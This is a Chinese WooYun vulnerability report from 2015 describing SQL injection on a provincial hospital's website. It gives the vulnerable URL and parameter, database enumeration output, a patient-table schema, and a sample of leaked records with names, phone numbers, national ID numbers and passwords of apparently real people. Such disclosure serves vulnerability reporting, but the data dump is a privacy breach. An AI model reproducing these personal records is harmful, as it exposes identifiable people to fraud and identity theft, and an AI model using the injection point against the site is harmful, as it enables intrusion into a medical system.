当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097162

漏洞标题:某省级甲等重点医院注入漏洞影响大量市民信息 包括姓名、身份证号、联系电话、医保卡号等(涉及几十万数据)

相关厂商:jdyyeb.com

漏洞作者: 路人甲

提交时间:2015-02-13 19:07

修复时间:2015-03-30 19:08

公开时间:2015-03-30 19:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-13: 细节已通知厂商并且等待厂商处理中
2015-02-17: 厂商已经确认,细节仅向厂商公开
2015-02-27: 细节向核心白帽子及相关领域专家公开
2015-03-09: 细节向普通白帽子公开
2015-03-19: 细节向实习白帽子公开
2015-03-30: 细节向公众公开

简要描述:

某省级甲等重点医院注入漏洞 泄露大量市民信息 包括姓名、身份证号、联系电话、医保卡号等(涉及几十万数据)

详细说明:

某省级甲等重点医院注入漏洞 泄露大量市民信息 包括姓名、身份证号、联系电话、医保卡号等(涉及几十万数据)

2.png


附上注入点:http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374
注入参数:pid

1.png


Database: information_schema                                                   
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: jdyyeb
[4 tables]
+---------------------------------------+
| about                                 |
| about_class                           |
| adclass                               |
| config_class                          |
+---------------------------------------+


泄露大量市民信息:

ID	InsureSeriesID	XM	XB	CSNY	LXDH	GZDM	SFZH	Email	PassWord	BorthAddress	CARD	ZJHM
6212270069	<blank>	汤俊杰	男	12 16 1982 12:00AM	13564318757	<blank>	310101198212162000	NULL	767793	NULL	NULL	NULL
6212270090	<blank>	李美龄	女	02 19 1986 12:00AM	13761455739	<blank>	610402198602190000	NULL	170674	NULL	NULL	NULL
6212270117	<blank>	陈丽敏	女	10 10 1962 12:00AM	13901995775	<blank>	310102196210104000	NULL	539905	NULL	NULL	NULL
6301040003	<blank>	施丽丹	女	06  7 1983 12:00AM	13816434968	<blank>	320684198306071000	NULL	349404	NULL	NULL	NULL
6301040004	<blank>	张伊文	女	08 15 1988 12:00AM	15601971041	<blank>	310107198808154000	NULL	972614	NULL	NULL	NULL
6301040005	<blank>	卢辉明	男	11  1 1976 12:00AM	13818453805	<blank>	410711197611011000	NULL	157815	NULL	NULL	NULL
6301040006	<blank>	商思军	男	12 10 1968 12:00AM	13564399121	<blank>	310107196812101000	NULL	727907	NULL	NULL	NULL
6301040007	<blank>	张丽娟	女	03 14 1991 12:00AM	15216861664	<blank>	340321199103141000	NULL	941975	NULL	NULL	NULL
6301040008	<blank>	王如臣	男	10 17 1975 12:00AM	15618880755	<blank>	41080320130104100000	NULL


还有很多,不逐一列举

+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| BorthAddress    | varchar  |
| CARD            | varchar  |
| CKDate          | datetime |
| Class1_ID       | varchar  |
| Class1_R        | varchar  |
| Class2_ID       | varchar  |
| Class2_R        | varchar  |
| Class3_ID       | varchar  |
| Class3_R        | varchar  |
| Clinic_No       | varchar  |
| Contract_ID     | varchar  |
| Count_Flag      | varchar  |
| Count_Flag_Date | datetime |
| Count_Status    | varchar  |
| CSNY            | datetime |
| CYRQ            | datetime |
| DJCount         | int      |
| DJJE            | money    |
| DJModi          | varchar  |
| DJXM            | text     |
| DJYS            | varchar  |
| DWDM            | varchar  |
| DWFZDM          | varchar  |
| Email           | varchar  |
| ETDate          | datetime |
| GB              | varchar  |
| GH              | varchar  |
| GRDNH           | varchar  |
| GWDM            | varchar  |
| GZDM            | varchar  |
| GZKS            | text     |
| HF              | varchar  |
| HISGroupSFID    | varchar  |
| HisTFBJ         | varchar  |
| Hosptial_No     | varchar  |
| HSDate          | datetime |
| HSYS            | varchar  |
| HYXM            | text     |
| ID              | varchar  |
| IFSend          | varchar  |
| IFUpDown        | varchar  |
| InsureSeriesID  | varchar  |
| JCLB            | varchar  |
| JCRQ            | datetime |
| JCXM            | text     |
| JDRQ            | datetime |
| JE              | money    |
| JLYS            | varchar  |
| JZSFFS          | varchar  |
| LastModiDate    | datetime |
| LastModiYS      | varchar  |
| LXDH            | varchar  |
| Medical_No      | varchar  |
| MZ              | varchar  |
| NEWDJXM         | text     |
| Notices         | varchar  |
| NOWJE           | money    |
| NOWSSJE         | money    |
| OperaID         | varchar  |
| PACS_EIS        | varchar  |
| PACSXM          | text     |
| PassWord        | varchar  |
| PHOTO           | image    |
| PntBarCode      | int      |
| PntBarCodeTime  | datetime |
| PrintCount      | int      |
| PrintDate       | datetime |
| PrintYS         | varchar  |
| QUEUEID         | varchar  |
| RCardDate       | datetime |
| RCardFlag       | varchar  |
| ReCall          | varchar  |
| SendWhere       | varchar  |
| SFBJ            | varchar  |
| SFYS            | varchar  |
| SFZH            | varchar  |
| SpecialFlag     | varchar  |
| SQYS            | varchar  |
| SSJE            | money    |
| SSQX            | varchar  |
| SSSS            | varchar  |
| TJFB            | varchar  |
| TXDZ            | varchar  |
| updateState     | varchar  |
| updatesuccess   | varchar  |
| updatetime      | varchar  |
| UpDownTime      | datetime |
| VIPID           | varchar  |
| WCKS            | text     |
| WCXM            | text     |
| WHCD            | varchar  |
| XB              | varchar  |
| XFXM            | text     |
| XJJE            | money    |
| XJJE1           | money    |
| XJJE10          | money    |
| XJJE11          | money    |
| XJJE12          | money    |
| XJJE13          | money    |
| XJJE14          | money    |
| XJJE15          | money    |
| XJJE2           | money    |
| XJJE3           | money    |
| XJJE4           | money    |
| XJJE5           | money    |
| XJJE6           | money    |
| XJJE7           | money    |
| XJJE8           | money    |
| XJJE9           | money    |
| XM              | varchar  |
| YCXM            | text     |
| YSFBJ           | varchar  |
| ZHXMDM          | varchar  |
| ZJDCRQ          | datetime |
| ZJDCYS          | varchar  |
| ZJE             | money    |
| ZJHM            | varchar  |
| ZKL             | float    |
| ZY              | varchar  |
+-----------------+----------+

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-17 08:24

厂商回复:

最新状态:

暂无